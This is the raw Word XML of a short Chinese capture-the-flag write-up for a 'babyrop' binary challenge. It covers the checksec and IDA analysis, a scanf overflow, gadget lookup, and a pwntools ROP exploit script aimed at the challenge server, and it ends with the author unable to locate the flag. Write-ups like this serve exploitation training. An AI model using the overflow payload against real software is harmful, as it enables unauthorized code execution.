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D0327" w14:textId="4DED5EA2" w:rsidR="00512C82" w:rsidRDefault="00512C82" w:rsidP="00512C82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checksec和file一下函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00512C82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D87FF41" wp14:editId="5551C593">
            <wp:extent cx="5274310" cy="483870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1505626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8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9AEA2" w14:textId="3DB77521" w:rsidR="00512C82" w:rsidRDefault="00512C82" w:rsidP="00512C82">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nx开启用rop链形式解题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539FDCF" w14:textId="4AC85133" w:rsidR="00512C82" w:rsidRDefault="00512C82" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2．放入64位ida看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00512C82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01DFF15D" wp14:editId="3302FAC0">
            <wp:extent cx="5274310" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="264698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83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D246" w14:textId="146D93EF" w:rsidR="00512C82" w:rsidRDefault="00512C82" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512C82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56505E6F" wp14:editId="53171F96">
            <wp:extent cx="5274310" cy="1882140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="12474668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4668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7C83" w14:textId="4AB1D45A" w:rsidR="00512C82" w:rsidRDefault="00512C82" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3．</w:t>
      </w:r>
      <w:r w:rsidR="000B1E8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scanf有溢出漏洞再查询ret和pop rdi的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940986D" w14:textId="3EDBF870" w:rsidR="000B1E8F" w:rsidRDefault="000B1E8F" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1E8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BECD15" wp14:editId="761D7D81">
            <wp:extent cx="5274310" cy="321945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="16328129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693A2" w14:textId="10E493B1" w:rsidR="000B1E8F" w:rsidRDefault="000B1E8F" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为64位寄存器他的填充顺序是</w:t>
      </w:r>
      <w:r w:rsidR="000A2526" w:rsidRPr="000A2526">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D4ECFB6" wp14:editId="44991B02">
            <wp:extent cx="5274310" cy="3322320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1054025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2594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A2526">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32位顺序与他不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0C3F5D" w14:textId="5B276903" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4．最后是愉快的脚本环节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E09FC" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1CF6E" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF825C" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context.log_level='debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98BD45" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p=remote('node5.buuoj.cn',26389)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA1BC3B" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># p=process("./babyrop")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BF1E2B" w14:textId="0CEB1542" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload=b'a'*(0x10+0x8)+p64(0x00400683)+p64(0x00601048)+p64(0x00400490)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF51F79" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC56C94" w14:textId="77777777" w:rsidR="000A2526" w:rsidRDefault="000A2526" w:rsidP="000A2526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D1F9FB" w14:textId="3924D6D0" w:rsidR="00157AEC" w:rsidRPr="000A2526" w:rsidRDefault="00157AEC" w:rsidP="00512C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后ls发现找不到需要用cat 具体地址 find找到，但是我没找到，没招了</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00157AEC" w:rsidRPr="000A25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A123AE" w14:textId="77777777" w:rsidR="0084444A" w:rsidRDefault="0084444A" w:rsidP="00157AE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3A7BAF" w14:textId="77777777" w:rsidR="0084444A" w:rsidRDefault="0084444A" w:rsidP="00157AE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952AA" w14:textId="77777777" w:rsidR="0084444A" w:rsidRDefault="0084444A" w:rsidP="00157AE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15D695E" w14:textId="77777777" w:rsidR="0084444A" w:rsidRDefault="0084444A" w:rsidP="00157AE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30A65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DB0AF40"/>
    <w:lvl w:ilvl="0" w:tplc="844AB4E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7321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C82"/>
    <w:rsid w:val="000A2526"/>
    <w:rsid w:val="000B1E8F"/>
    <w:rsid w:val="00157AEC"/>
    <w:rsid w:val="004F1B06"/>
    <w:rsid w:val="00512C82"/>
    <w:rsid w:val="007B377B"/>
    <w:rsid w:val="00844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D629D06"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB5AD9B3-10A3-4F48-80D8-5D0F11894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12C8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2C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2C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2C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2C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2C82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2C8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2C8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2C8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2C82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2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2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2C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2C82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12C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2C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2C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2C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2C8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2C8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2C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2C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2C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2C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2C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2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2C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2C82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57AE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57AE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57AE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57AE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2</Pages>
  <Words>88</Words>
  <Characters>309</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2025-08-05T08:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-05T13:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>